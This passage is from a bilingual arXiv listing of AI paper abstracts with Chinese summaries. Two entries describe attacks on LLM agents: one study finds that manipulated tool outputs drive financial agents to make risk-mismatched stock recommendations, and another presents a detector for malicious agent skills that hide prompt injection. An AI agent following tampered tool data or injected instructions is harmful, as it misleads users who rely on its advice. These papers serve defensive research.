our method and contributing to the acceleration of context-aware misinformation detection in financial Natural Language Processing. Our models (14B and 32B) are available at https://huggingface.co/KaiNKaiho.

2603.12564 2026-05-27 cs.CL cs.AI 版本更新

Sell Me This Stock: Unsafe Recommendation Drift in LLM Agents

卖给我这支股票:LLM智能体中的不安全推荐漂移

Zekun Wu, Adriano Koshiyama, Sahan Bulathwela, Maria Perez-Ortiz

发表机构 * Centre for Artificial Intelligence, University College London(人工智能研究中心,伦敦大学学院)

AI总结 研究LLM智能体在多轮金融推荐中因工具输出被操纵而产生风险不匹配推荐的问题,通过实验揭示评估盲区并分析机制。

详情
AI中文摘要

人们越来越多地使用LLM智能体进行多轮金融推荐,智能体通过工具获取市场数据并跨轮次跟踪用户偏好。当工具输出被操纵时,推荐不再匹配用户声明的风险偏好,但由于NDCG等标准指标仅衡量一般相关性,风险股票和安全股票的得分相同,因此指标显示一切正常。我们将这种差距称为评估盲区。我们在八个语言模型上回放23轮金融咨询对话,每段对话分别使用干净和被操纵的工具数据运行两次。质量得分与干净会话几乎相同,而智能体在65-99%的轮次中产生风险不匹配的推荐,所有八个模型一致。该机制在逐轮中可见:在1,840轮中,80%的风险评分引用逐字复现了被操纵的值,没有一轮提出质疑,高风险股票的安全语言框架比例从14%(Qwen2.5-7B)到69%(Claude Sonnet 4.6)不等。使前沿模型成为优秀智能体的特性——忠实地将其推理基于工具输出——也使其跟随被操纵的输出。损害并非由记忆驱动:仅污染当前轮次仍会产生95%的违规。模型内部能区分操纵(稀疏自编码器特征将对抗性扰动与随机扰动分开),但这并未转化为更安全的输出。激活层干预仅恢复不到6%的安全差距,提示级自我验证失败,因为自我检查读取了相同的被操纵数据,而参数化交叉检查在前沿模型上每轮以99-100%的比率标记污染,但整体适宜性仍未改变:智能体识别出篡改,但仍然推荐它。

英文摘要

People increasingly use LLM agents for multi-turn financial recommendations, where the agent pulls market data through tools and tracks user preferences across turns. When tool outputs are manipulated, the recommendations stop matching the user's stated risk profile, but because standard metrics like NDCG only score general relevance, risky and safe stocks score alike, so the metric says nothing went wrong. We call this gap evaluation blindness. We replay 23-turn financial advisory conversations across eight language models, running each dialogue twice with clean and manipulated tool data. Quality scores stay nearly identical to clean sessions while the agents produce risk-mismatched recommendations in 65-99% of turns, unanimous across all eight models. The mechanism is visible turn-by-turn: 80% of risk-score citations across 1,840 turns reproduce the manipulated value verbatim, not a single turn pushes back, and safe-language framing of high-risk stocks ranges from 14% (Qwen2.5-7B) to 69% (Claude Sonnet 4.6). The property that makes frontier models good agents, faithfully grounding their reasoning in tool outputs, also makes them follow manipulated ones. The damage is not memory-driven: contaminating only the current turn still produces 95% of the violations. The model internally distinguishes the manipulation (sparse autoencoder features separate adversarial from random perturbations), but this does not translate into safer output. Activation-level interventions recover under 6% of the safety gap, prompt-level self-verification fails because the self-check reads the same manipulated data, and a parametric cross-check that flags contamination at 99-100% per turn on a frontier model still leaves aggregate suitability unchanged: the agent identifies the tampering and recommends it anyway.

2604.11467 2026-05-27 cs.AI cs.HC cs.LG 版本更新

From Attribution to Action: A Human-Centered Application of Activation Steering

从归因到行动:激活导向的人本应用

Tobias Labarta, Maximilian Dreyer, Katharina Weitz, Wojciech Samek, Sebastian Lapuschkin

发表机构 * Fraunhofer Heinrich-Hertz-Institut(弗劳恩霍夫 Heinrich-Hertz 研究所) Technische Universität Berlin(柏林技术大学) BIFOLD – Berlin Institute for the Foundations of Learning and Data(柏林学习与数据基础研究所)

AI总结 提出结合SAE归因与激活导向的交互式工作流,通过专家访谈验证其能促进从检查到干预的转变,并揭示组件抑制等调试策略及潜在风险。

详情
AI中文摘要

可解释人工智能(XAI)方法揭示了哪些特征影响模型预测,但为实践者基于这些解释采取行动提供了有限的手段。通过XAI识别出的组件的激活导向为可操作的解释提供了一条路径,但其实际效用仍未得到充分研究。我们引入了一个交互式工作流,将基于SAE的归因与激活导向相结合,用于视觉模型中概念使用的实例级分析,并实现为一个基于网页的工具。基于此工作流,我们进行了半结构化专家访谈(N=8),在CLIP上执行调试任务,以调查实践者如何推理、信任和应用激活导向。我们发现,导向使得从检查转向基于干预的假设检验(8/8参与者),大多数参与者将信任建立在观察到的模型响应上,而非仅仅解释的合理性(6/8)。参与者采用了系统性的调试策略,其中组件抑制占主导(7/8),并指出了包括涟漪效应和实例级修正的有限泛化在内的风险。总体而言,激活导向使可解释性更具可操作性,同时为安全有效使用提出了重要考虑。

英文摘要

Explainable AI (XAI) methods reveal which features influence model predictions, yet provide limited means for practitioners to act on these explanations. Activation steering of components identified via XAI offers a path toward actionable explanations, although its practical utility remains understudied. We introduce an interactive workflow combining SAE-based attribution with activation steering for instance-level analysis of concept usage in vision models, implemented as a web-based tool. Based on this workflow, we conduct semi-structured expert interviews (N=8) with debugging tasks on CLIP to investigate how practitioners reason about, trust, and apply activation steering. We find that steering enables a shift from inspection to intervention-based hypothesis testing (8/8 participants), with most grounding trust in observed model responses rather than explanation plausibility alone (6/8). Participants adopted systematic debugging strategies dominated by component suppression (7/8) and highlighted risks including ripple effects and limited generalization of instance-level corrections. Overall, activation steering renders interpretability more actionable while raising important considerations for safe and effective use.

2604.11056 2026-05-27 cs.LG cs.AI 版本更新

Where Hindsight Credit Can Reside: A Signed-Capacity View of Token Updates in RLVR

事后信用可驻留之处:RLVR中令牌更新的有符号容量视角

Yuhang He, Haodong Wu, Siyi Liu, Hongyu Ge, Hange Zhou, Keyi Wu, Zhuo Zheng, Qihong Lin, Zixin Zhong, Yongqi Zhang

发表机构 * The Hong Kong University of Science and Technology (Guangzhou)(香港科学与技术大学(广州)) Huawei Technologies Ltd.(华为技术有限公司)

AI总结 本文通过条件互信息分析RLVR中令牌级信用的容量上限,提出四象限分解区分更新方向,并设计HAPO算法进行容量引导的优势重分配,提升数学推理性能。

详情
AI中文摘要

具有可验证奖励的强化学习(RLVR)提升了大语言模型(LLMs)的推理能力,但稀疏的结果奖励使得令牌级信用分配变得困难。我们将令牌级信用视为从行为策略到事后后验的奖励条件偏移。在自回归RLVR中,这种偏移可以通过条件互信息(CMI)表示,这表明令牌熵限制了可能的事后信用上限。然而,熵指示的是容量而非更新方向,因此我们引入了四象限分解,根据奖励极性和令牌熵来分离更新。受控干预表明,这两个因素共同塑造了令牌更新。持续的推理增益集中在有符号的高熵象限,而低熵更新则迅速饱和。基于此分析,我们提出了事后感知策略优化(HAPO),这是对GRPO的一种符号保持修改,执行容量引导的优势重分配。在两个模型设置的数学推理基准上的实验表明,HAPO在熵感知基线中取得了有竞争力的性能。

英文摘要

Reinforcement Learning with Verifiable Rewards (RLVR) improves the reasoning ability of Large Language Models (LLMs), but sparse outcome rewards make token-level credit assignment difficult. We study token-level credit as a reward-conditioned shift from the behavior policy to a hindsight posterior. In autoregressive RLVR, this shift can be expressed through Conditional Mutual Information (CMI), which shows that token entropy upper-bounds possible hindsight credit. Entropy, however, indicates capacity rather than update direction, so we introduce the Four Quadrant Decomposition to separate updates by reward polarity and token entropy. Controlled interventions show that these two factors jointly shape token updates. Sustained reasoning gains concentrate in signed high-entropy quadrants, whereas low-entropy updates saturate quickly. Based on this analysis, we propose Hindsight-Aware Policy Optimization (HAPO), a sign-preserving modification to GRPO that performs capacity-guided advantage reallocation. Experiments on mathematical reasoning benchmarks in two model settings show that HAPO achieves competitive performance among entropy-aware baselines.

2604.10102 2026-05-27 cs.CV cs.AI 版本更新

Degradation-Consistent Paired Training for Robust AI-Generated Image Detection

退化一致性配对训练用于鲁棒的AI生成图像检测

Zongyou Yang, Yinghan Hou, Xiaokun Yang

发表机构 * Department of Computer Science(计算机科学系) University College London(伦敦大学学院) Department of Earth Science and Engineering(地球科学与工程系) Imperial College London(伦敦帝国理工学院) School of Electronic Information(电子信息学院)

AI总结 提出退化一致性配对训练(DCPT),通过特征一致性和预测一致性约束显式增强模型对JPEG压缩、高斯模糊等真实世界图像退化的鲁棒性,在Synthbuster基准上平均准确率提升9.1个百分点。

Comments 6 pages, 5 figures, 2 tables

详情
AI中文摘要

AI生成图像检测器在真实世界图像退化(如JPEG压缩、高斯模糊和分辨率降采样)下性能显著下降。我们观察到,包括B-Free在内的最先进方法将退化鲁棒性视为数据增强的副产品,而非明确的训练目标。在这项工作中,我们提出退化一致性配对训练(DCPT),这是一种简单而有效的训练策略,通过配对一致性约束显式增强鲁棒性。对于每张训练图像,我们构建一个干净视图和一个退化视图,然后施加两个约束:特征一致性损失,最小化干净表示和退化表示之间的余弦距离;以及基于对称KL散度的预测一致性损失,对齐两个视图的输出分布。DCPT不增加额外参数和推理开销。在Synthbuster基准(9个生成器,8种退化条件)上的实验表明,与没有配对训练的相同基线相比,DCPT将退化条件下的平均准确率提高了9.1个百分点,同时仅牺牲了0.9%的干净准确率。在JPEG压缩下改进最为显著(+15.7%至+17.9%)。消融实验进一步揭示,添加架构组件会导致在有限训练数据上过拟合,证实了对于退化鲁棒性,训练目标改进比架构增强更有效。

英文摘要

AI-generated image detectors suffer significant performance degradation under real-world image corruptions such as JPEG compression, Gaussian blur, and resolution downsampling. We observe that state-of-the-art methods, including B-Free, treat degradation robustness as a byproduct of data augmentation rather than an explicit training objective. In this work, we propose Degradation-Consistent Paired Training (DCPT), a simple yet effective training strategy that explicitly enforces robustness through paired consistency constraints. For each training image, we construct a clean view and a degraded view, then impose two constraints: a feature consistency loss that minimizes the cosine distance between clean and degraded representations, and a prediction consistency loss based on symmetric KL divergence that aligns output distributions across views. DCPT adds zero additional parameters and zero inference overhead. Experiments on the Synthbuster benchmark (9 generators, 8 degradation conditions) demonstrate that DCPT improves the degraded-condition average accuracy by 9.1 percentage points compared to an identical baseline without paired training, while sacrificing only 0.9% clean accuracy. The improvement is most pronounced under JPEG compression (+15.7% to +17.9%). Ablation further reveals that adding architectural components leads to overfitting on limited training data, confirming that training objective improvement is more effective than architectural augmentation for degradation robustness.

2509.21882 2026-05-27 cs.LG cs.AI 版本更新

Position: The Hidden Costs and Measurement Gaps of Reinforcement Learning with Verifiable Rewards

立场:具有可验证奖励的强化学习的隐藏成本与测量缺口

Fang Wu, Aaron Tu, Weihao Xuan, Heli Qi, Xu Huang, Qingcheng Zeng, Shayan Talaei, Yijia Xiao, Peng Xia, Xiangru Tang, Yuchen Zhuang, Yinxi Li, Bing Hu, Hanqun Cao, Wenqi Shi, Rui Yang, Nan Liu, Huaxiu Yao, Ge Liu, Li Erran Li, Amin Saberi, Naoto Yokoya, Jure Leskovec, Yejin Choi

发表机构 * Stanford University(斯坦福大学) UC Berkeley(加州大学伯克利分校) The University of Tokyo(东京大学) RIKEN AIP(理化学研究所AIP) Waseda University(早稻田大学) Georgia Tech(佐治亚理工学院) Northwestern University(西北大学) UCLA(加州大学洛杉矶分校) UNC Chapel Hill(北卡罗来纳大学教堂山分校) Yale University(耶鲁大学) University of Waterloo(滑铁卢大学) Independent Researcher(独立研究者) CUHK(香港中文大学) UT Southwestern Medical Center(西南医学中心) National University of Singapore(新加坡国立大学) UIUC(伊利诺伊大学厄巴纳-香槟分校) Amazon AWS AI(亚马逊AWS人工智能)

AI总结 本文指出,具有可验证奖励的强化学习(RLVR)在提升大语言模型性能时,常因预算不匹配、尝试膨胀和基准数据污染等混淆因素导致收益被高估,并提出了预算匹配饱和曲线、校准跟踪、法官鲁棒性测试和污染筛查等最低标准。

详情
AI中文摘要

具有可验证奖励的强化学习(RLVR)是一种实用、可扩展的方法,用于在数学、代码和其他结构化任务上改进大语言模型。然而,我们认为许多头条RLVR收益尚未得到充分验证,因为报告常常将策略改进与三个混淆因素混为一谈:(i) RLVR与基线评估之间的预算不匹配,(ii) 尝试膨胀和校准漂移,将弃权转化为自信答案,以及(iii) 基准数据污染。通过预算匹配的复现和部分提示污染探测,我们发现一旦预算、提示和数据集版本匹配,并且将受污染集视为记忆探测而非推理证据,几个被广泛引用的差距会大幅缩小或消失。这并不意味着RLVR无效,而是表明当前的测量常常夸大能力收益并掩盖可靠性成本。因此,我们为RLVR训练和评估提出了一个紧凑的、考虑成本的的最低标准:带有方差、校准和弃权跟踪的预算匹配饱和曲线,当使用LLM评判者时的评判者鲁棒性压力测试,以及明确的污染筛查。有了这些控制,RLVR在可验证领域仍然有效且可部署,但如果没有这些控制,推理收益应被视为暂定的。

英文摘要

Reinforcement learning with verifiable rewards (RLVR) is a practical, scalable way to improve large language models on math, code, and other structured tasks. However, we argue that many headline RLVR gains are not yet well validated because reports often conflate policy improvement with three confounds: (i) budget mismatch between RLVR and baseline evaluations, (ii) attempt inflation and calibration drift that convert abstentions into confident answers, and (iii) benchmark data contamination. Using budget-matched reproductions and partial-prompt contamination probes, we find that several widely cited gaps shrink substantially or disappear once budgets, prompts, and dataset versions are matched and contaminated sets are treated as memorization probes rather than evidence of reasoning. This does not mean that RLVR is ineffective, but it implies that current measurements often overstate capability gains and obscure reliability costs. We therefore propose a compact, tax-aware minimum standard for RLVR training and evaluation: budget-matched saturation curves with variance, calibration, and abstention tracking, a judge-robustness stress test when LLM judges are used, and an explicit contamination screen. With these controls, RLVR remains effective and deployable in verifiable domains, but reasoning gains should be treated as provisional without them.

2604.08999 2026-05-27 cs.CL cs.AI cs.LG 版本更新

ASTRA: Adaptive Semantic Tree Reasoning Architecture for Complex Table Question Answering

ASTRA: 面向复杂表格问答的自适应语义树推理架构

Xiaoke Guo, Songze Li, Zhiqiang Liu, Zhaoyan Gong, Yuanxiang Liu, Huajun Chen, Wen Zhang

发表机构 * Zhejiang University(浙江大学)

AI总结 提出ASTRA架构,通过AdaSTR将表格重构为逻辑语义树,并利用DuTR双模式推理框架结合树搜索文本导航与符号代码执行,在复杂表格问答中达到最优性能。

Comments ACL 2026 Main

详情
AI中文摘要

表格序列化仍然是大型语言模型(LLMs)在复杂表格问答中的关键瓶颈,受到结构忽视、表示差距和推理不透明等挑战的阻碍。现有的序列化方法无法捕获显式层次结构且缺乏模式灵活性,而当前的基于树的方法则存在语义适应性有限的问题。为了解决这些限制,我们提出了ASTRA(自适应语义树推理架构),包括两个主要模块:AdaSTR和DuTR。首先,我们引入AdaSTR,它利用LLMs的全局语义意识将表格重构为逻辑语义树。这种序列化显式建模了层次依赖关系,并采用自适应机制根据表格规模优化构建策略。其次,基于此结构,我们提出了DuTR,一种双模式推理框架,集成了基于树搜索的文本导航以实现语言对齐,以及符号代码执行以实现精确验证。在复杂表格基准上的实验表明,我们的方法达到了最先进的性能。

英文摘要

Table serialization remains a critical bottleneck for Large Language Models (LLMs) in complex table question answering, hindered by challenges such as structural neglect, representation gaps, and reasoning opacity. Existing serialization methods fail to capture explicit hierarchies and lack schema flexibility, while current tree-based approaches suffer from limited semantic adaptability. To address these limitations, we propose ASTRA (Adaptive Semantic Tree Reasoning Architecture) including two main modules, AdaSTR and DuTR. First, we introduce AdaSTR, which leverages the global semantic awareness of LLMs to reconstruct tables into Logical Semantic Trees. This serialization explicitly models hierarchical dependencies and employs an adaptive mechanism to optimize construction strategies based on table scale. Second, building on this structure, we present DuTR, a dual-mode reasoning framework that integrates tree-search-based textual navigation for linguistic alignment and symbolic code execution for precise verification. Experiments on complex table benchmarks demonstrate that our method achieves state-of-the-art (SOTA) performance.

2604.08819 2026-05-27 cs.CV cs.AI cs.LG cs.MM 版本更新

SenBen: Sensitive Scene Graphs for Explainable Content Moderation

SenBen: 用于可解释内容审核的敏感场景图

Fatih Cagatay Akyon, Alptekin Temizel

发表机构 * Graduate School of Informatics, METU(信息学院研究生院,梅尔夫大学) Ultralytics, Inc.(Ultralytics公司)

AI总结 提出SenBen基准和紧凑学生模型,通过多任务训练和词汇平衡策略实现敏感内容的空间定位与可解释性,在场景图生成上超越多数VLM。

Comments Accepted at CVPRW 2026

详情
AI中文摘要

内容审核系统将图像分类为安全或不安全,但缺乏空间定位和可解释性:它们无法解释检测到了什么敏感行为、涉及谁或发生在哪里。我们引入了敏感基准(SenBen),这是第一个用于敏感内容的大规模场景图基准,包含来自157部电影的13,999帧,标注了Visual Genome风格的场景图(25个对象类别、28个属性,包括情感状态如痛苦、恐惧、攻击和痛苦,14个谓词)以及跨5个类别的16个敏感标签。我们通过多任务配方将前沿VLM蒸馏成一个紧凑的241M学生模型,该配方通过基于后缀的对象身份、词汇感知召回(VAR)损失和解耦的Query2Label标签头(带非对称损失)解决自回归场景图生成中的词汇不平衡问题,在SenBen召回率上比标准交叉熵训练提高了+6.4个百分点。在基于场景图的指标上,我们的学生模型优于除Gemini模型外的所有评估VLM和所有商业安全API,同时在所有模型中实现了最高的对象检测和字幕生成分数,推理速度提升7.6倍,GPU内存减少16倍。

英文摘要

Content moderation systems classify images as safe or unsafe but lack spatial grounding and interpretability: they cannot explain what sensitive behavior was detected, who is involved, or where it occurs. We introduce the Sensitive Benchmark (SenBen), the first large-scale scene graph benchmark for sensitive content, comprising 13,999 frames from 157 movies annotated with Visual Genome-style scene graphs (25 object classes, 28 attributes including affective states such as pain, fear, aggression, and distress, 14 predicates) and 16 sensitivity tags across 5 categories. We distill a frontier VLM into a compact 241M student model using a multi-task recipe that addresses vocabulary imbalance in autoregressive scene graph generation through suffix-based object identity, Vocabulary-Aware Recall (VAR) Loss, and a decoupled Query2Label tag head with asymmetric loss, yielding a +6.4 percentage point improvement in SenBen Recall over standard cross-entropy training. On grounded scene graph metrics, our student model outperforms all evaluated VLMs except Gemini models and all commercial safety APIs, while achieving the highest object detection and captioning scores across all models, at $7.6\times$ faster inference and $16\times$ less GPU memory.

2603.11394 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Stop Listening to Me! How Multi-turn Conversations Can Degrade LLM Reliability

别听我的!多轮对话如何降低LLM的可靠性

Kevin H. Guo, Chao Yan, Avinash Baidya, Katherine Brown, Xiang Gao, Juming Xiong, Zhijun Yin, Bradley A. Malin

发表机构 * Vanderbilt University(范德比尔大学) Vanderbilt University Medical Center(范德比尔大学医学中心) Intuit AI Research(Intuit人工智能研究)

AI总结 提出“坚持或切换”(SoS)框架,通过将问答空间分割为多个顺序呈现来评估LLM在多轮对话中的可靠性,发现对话税导致准确性和拒绝错误建议的能力平均下降30%,并观察到盲目切换现象。

详情
AI中文摘要

大型语言模型(LLM)在静态基准测试中表现出色,但它们在更能反映实际使用的多轮对话中的性能仍未得到充分研究。解决这一差距在医疗保健等高风险环境中至关重要,因为患者和临床医生正在转向LLM聊天机器人来处理他们的医疗咨询。在这里,我们引入了“坚持或切换”(SoS)框架,该框架将问答空间划分为多个顺序呈现,以模拟两种以安全为中心的行为:坚持(即坚持正确的答案选择或拒绝错误的建议)和灵活性(即在引入正确建议时切换到该建议)。在三个临床基准测试中评估了17个LLM,我们观察到普遍存在的对话税,其中将答案空间分割为顺序呈现使端到端准确性和对错误建议的拒绝率平均下降高达30%,在某些模型中达到65%。我们还观察到盲目切换,即模型从初始拒绝转向错误和正确建议的比率几乎相同,达到50%。最后,我们表明,增加模型规模可以缓解其中一些对话效率低下的问题,但会加剧其他问题,例如从初始拒绝中采纳错误建议的倾向更高。我们的研究结果共同表明,静态基准测试所捕获的一般能力并不能推广到多轮对话中。

英文摘要

Large language models (LLMs) excel on static benchmarks, but their performance across multi-turn conversations, which better reflect real-world usage, remains understudied. Addressing this gap is critical in high-stakes settings like healthcare, where patients and clinicians are turning to LLM chatbots to address their medical inquiries. Here, we introduce the "stick-or-switch" (SoS) framework, which partitions a question-answer space into multiple sequential presentations to model two safety-centric behaviors: conviction (i.e., sticking to a correct answer selection or abstention against incorrect suggestions) and flexibility (i.e., switching to a correct suggestion when it is introduced). Evaluating 17 LLMs across three clinical benchmarks, we observe a pervasive conversation tax, where partitioning an answer-space into sequential presentations reduces end-to-end accuracy and abstention against incorrect suggestions by an average of up to 30%, reaching 65% in certain models. We also observe blind switching, where models transition an initial abstention to incorrect and correct suggestions at near-identical rates reaching 50%. Finally, we show that increasing model scale mitigates some of these conversational inefficacies while exacerbating others, such as a higher propensity to adopt an incorrect suggestion from an initial abstention. Together our findings demonstrate that the general proficiency captured by static benchmarks do not translate over multi-turn dialogues.

2604.07028 2026-05-27 cs.MA cs.AI cs.CL 版本更新

Strategic Persuasion with Trait-Conditioned Multi-Agent Systems for Iterative Legal Argumentation

基于特质条件的多智能体系统在迭代法律论证中的战略说服

Philipp D. Siedler

发表机构 * Aleph Alpha Research(Aleph Alpha研究)

AI总结 提出战略法庭框架,通过特质条件化的大语言模型智能体模拟多轮法律辩论,发现异质团队表现更优,并引入强化学习特质编排器动态优化辩护策略。

详情
AI中文摘要

在诸如法律、外交和谈判等对抗性领域中的战略互动是通过语言中介的,然而大多数博弈论模型忽略了通过话语运作的说服机制。我们提出了战略法庭框架,这是一个多智能体模拟环境,其中由特质条件化的大语言模型(LLM)智能体组成的控方和辩方团队参与迭代的、基于轮次的法律论证。智能体使用九种可解释的特质进行实例化,这些特质被组织成四种原型,从而能够系统控制修辞风格和战略取向。我们在10个合成法律案例和84个三特质团队配置上评估该框架,使用DeepSeek-R1和Gemini 2.5 Pro进行了超过7,000次模拟试验。我们的结果表明,具有互补特质的异质团队始终优于同质配置,适度的交互深度产生更稳定的判决,并且某些特质(特别是量化和魅力型)对说服成功贡献不成比例。我们进一步引入了一个基于强化学习的特质编排器,该编排器根据案件和对手团队动态生成辩护特质,发现优于静态、人类设计的特质组合的策略。这些发现共同证明了语言可以被视为第一类战略行动空间,并为构建能够在多智能体环境中进行自适应说服的自主智能体提供了基础。

英文摘要

Strategic interaction in adversarial domains such as law, diplomacy, and negotiation is mediated by language, yet most game-theoretic models abstract away the mechanisms of persuasion that operate through discourse. We present the Strategic Courtroom Framework, a multi-agent simulation environment in which prosecution and defense teams composed of trait-conditioned Large Language Model (LLM) agents engage in iterative, round-based legal argumentation. Agents are instantiated using nine interpretable traits organized into four archetypes, enabling systematic control over rhetorical style and strategic orientation. We evaluate the framework across 10 synthetic legal cases and 84 three-trait team configurations, totaling over 7{,}000 simulated trials using DeepSeek-R1 and Gemini~2.5~Pro. Our results show that heterogeneous teams with complementary traits consistently outperform homogeneous configurations, that moderate interaction depth yields more stable verdicts, and that certain traits (notably quantitative and charismatic) contribute disproportionately to persuasive success. We further introduce a reinforcement-learning-based Trait Orchestrator that dynamically generates defense traits conditioned on the case and opposing team, discovering strategies that outperform static, human-designed trait combinations. Together, these findings demonstrate how language can be treated as a first-class strategic action space and provide a foundation for building autonomous agents capable of adaptive persuasion in multi-agent environments.

2604.06550 2026-05-27 cs.CR cs.AI 版本更新

SkillSieve: A Hierarchical Triage Framework for Detecting Malicious AI Agent Skills

SkillSieve:一种用于检测恶意AI代理技能的分层分流框架

Yinghan Hou, Zongyou Yang, Zaihu Pang, Xiujun Ma

发表机构 * Department of Earth Science and Engineering(地球科学与工程系) Imperial College London(帝国理工学院伦敦分校) Department of Computer Science(计算机科学系) University College London(伦敦大学学院) Lingban Technology Co., Ltd.(灵伴科技有限公司) State Key Laboratory of General Artificial Intelligence, Peking University(北京大学通用人工智能国家重点实验室)

AI总结 提出SkillSieve三层检测框架,通过启发式评分、LLM子任务分析和多LLM陪审团辩论,高效检测恶意AI代理技能,在390个技能基准上达到F1=0.920。

Comments 10 pages, 2 figures, 6 tables

详情
AI中文摘要

OpenClaw的ClawHub市场托管了数万个社区贡献的代理技能(我们2026-04-04快照中有49,592个),最近的审计报告显示13-26%包含安全漏洞。正则表达式扫描器无法检测混淆的有效载荷;形式化静态分析器无法读取隐藏提示注入和社会工程的SKILL.md自然语言指令。这两种方法都无法覆盖两种模态。 SkillSieve是一个三层检测框架,仅在需要时应用更深入的分析。第1层通过召回调优的启发式评分器运行正则表达式、AST和元数据检查,过滤掉86%的数据量。第2层将可疑技能路由到LLM,将分析拆分为四个并行的子任务,并输出结构化结果。第3层将高风险技能提交给由三个LLM组成的陪审团,它们独立投票并在意见分歧时进行辩论。 我们在49,592个真实的ClawHub技能和跨越五种规避技术的对抗样本上进行了评估,在440美元的ARM单板计算机上运行该管道。在390个技能的标记基准上,SkillSieve以每个技能0.006美元的成本实现了F1=0.920(精确率0.912,召回率0.929)。可选的XGBoost快速路径减少了32%的第2/3层LLM调用,F1下降1.6点,同时保持了全管道的召回率(0.929)。为了跨生态系统泛化,我们将该框架适配到飞书/Lark,并扫描了52个真实包,其中第2层纠正了第1层因领域特定习语产生的误报,表明了一条低成本的适配路径到类似的企业平台。我们将SkillSieve部署为飞书聊天机器人,用于实时技能审查。代码、数据和基准已开源。

英文摘要

OpenClaw's ClawHub marketplace hosts tens of thousands of community-contributed agent skills (49,592 in our 2026-04-04 snapshot), and recent audits report that 13-26% contain security vulnerabilities. Regex scanners miss obfuscated payloads; formal static analyzers cannot read the natural-language SKILL.md instructions that hide prompt injection and social engineering. Neither approach covers both modalities. SkillSieve is a three-layer detection framework that applies deeper analysis only where needed. Layer 1 runs regex, AST, and metadata checks through a recall-tuned heuristic scorer, filtering 86% of the volume. Layer 2 routes suspicious skills to an LLM, splitting the analysis into four parallel sub-tasks with structured outputs. Layer 3 puts high-risk skills before a jury of three LLMs that vote independently and debate when they disagree. We evaluate on 49,592 real ClawHub skills and adversarial samples across five evasion techniques, running the pipeline on a 440 USD ARM single-board computer. On a 390-skill labeled benchmark, SkillSieve achieves F1 = 0.920 (precision 0.912, recall 0.929) at 0.006 USD per skill. An optional XGBoost fast-path cuts 32% of Layer-2/3 LLM calls with a 1.6-point F1 reduction, while preserving full-pipeline recall (0.929). For cross-ecosystem generalization, we adapt the framework to Feishu/Lark and scan 52 real packages, where Layer 2 corrects Layer 1 false positives from domain-specific idioms, suggesting a low-cost adaptation path to similar enterprise platforms. We deploy SkillSieve as a Feishu chat bot for real-time skill vetting. Code, data, and benchmark are open-sourced.

2604.07190 2026-05-27 cs.CY cs.AI cs.LG 版本更新

The ATOM Report: Measuring the Open Language Model Ecosystem

ATOM报告:衡量开放语言模型生态系统

Nathan Lambert, Florian Brand

发表机构 * Interconnects AI

AI总结 本研究通过分析约1500个主流开放语言模型(如阿里巴巴的Qwen、DeepSeek、Meta的Llama)的下载量、衍生模型、推理市场份额和性能指标,揭示了2025年夏季中国模型超越美国模型并持续扩大差距的趋势。

Comments 23 pages, 17 figures

详情
AI中文摘要

我们呈现了领先开放语言模型及其构建者的全面采用快照,重点关注来自阿里巴巴的Qwen、DeepSeek、Meta的Llama等约1500个主流开放模型,这些模型构成了对研究人员、企业家和政策顾问至关重要的生态系统基础。我们记录了一个明显趋势:中国模型在2025年夏季超越其美国对应模型,随后扩大了与西方模型的差距。我们研究了Hugging Face下载量和模型衍生品、推理市场份额、性能指标等多种因素,以全面描绘该生态系统。

英文摘要

We present a comprehensive adoption snapshot of the leading open language models and who is building them, focusing on the ~1.5K mainline open models from the likes of Alibaba's Qwen, DeepSeek, Meta's Llama, that are the foundation of an ecosystem crucial to researchers, entrepreneurs, and policy advisors. We document a clear trend where Chinese models overtook their counterparts built in the U.S. in the summer of 2025 and subsequently widened the gap over their western counterparts. We study a mix of Hugging Face downloads and model derivatives, inference market share, performance metrics and more to make a comprehensive picture of the ecosystem.

2604.04948 2026-05-27 cs.IR cs.AI cs.LG 版本更新

From PDF to RAG-Ready: Evaluating Document Conversion Frameworks for Domain-Specific Question Answering

从PDF到RAG就绪:评估面向特定领域问答的文档转换框架

José Guilherme Marques dos Santos, Ricardo Yang, Rui Humberto Pereira, Alexandre Sousa, Brígida Mónica Faria, Henrique Lopes Cardoso, José Duarte, José Luís Reis, Luís Paulo Reis, Pedro Pimenta, José Paulo Marques dos Santos

发表机构 * Faculty of Engineering, University of Porto(葡萄牙波尔图大学工程学院) Department of Business Administration, University of Maia(马亚大学商业管理系) LIACC—Artificial Intelligence and Computer Science Laboratory, University of Porto(葡萄牙波尔图大学人工智能与计算机科学实验室) Department of Communication Sciences and Information Technologies, University of Maia(马亚大学通讯科学与信息科技系) School of Health, Polytechnic of Porto(波尔图理工学院健康学院) School of Technology and Management, Polytechnic Institute of Maia(马亚理工学院技术与管理学院)

AI总结 通过系统比较四种开源PDF转Markdown框架的21种流水线配置,发现文档预处理质量(尤其是层次化分块和元数据增强)对RAG系统问答准确率的影响远超转换工具本身,最佳配置(Docling+层次化分块+图像描述)达到94.1%准确率,超越人工整理。

Comments 27 pages, 3 figures, 7 tables

详情
Journal ref
Applied Sciences 16 (2026) 5069
AI中文摘要

检索增强生成(RAG)系统严重依赖文档预处理的质量,然而尚无先前研究通过评估PDF处理框架对下游问答准确性的影响来填补这一空白。我们通过系统比较四种开源PDF到Markdown转换框架——Docling、MinerU、Marker和DeepSeek OCR——在21种流水线配置下的表现,这些配置在转换工具、清洗变换、分块策略和元数据增强方面有所变化。评估使用了一个包含36份葡萄牙语行政文档(1706页,约49.2万词)的语料库上的50个问题基准,每个配置通过LLM作为裁判进行超过50次独立运行的评分。通过Wilcoxon符号秩检验和Cohen's d效应量评估统计显著性。两个基线界定了结果范围:朴素的PDFLoader(86.2%)和人工整理的Markdown(91.3%)。采用层次化分块和图像描述的Docling实现了最高的自动准确率(94.1±1.6%),甚至超越了人工整理。按问题类型分析显示,依赖表格的问题导致了最大的准确率差异,在基本分块和层次化分块之间存在33个百分点的差距。元数据增强和层次感知分块对准确率的贡献超过了转换框架本身。探索性的GraphRAG实现表现不如基本RAG(82%对比94.1%)。这些发现表明,数据准备质量是RAG系统性能的主导因素。

英文摘要

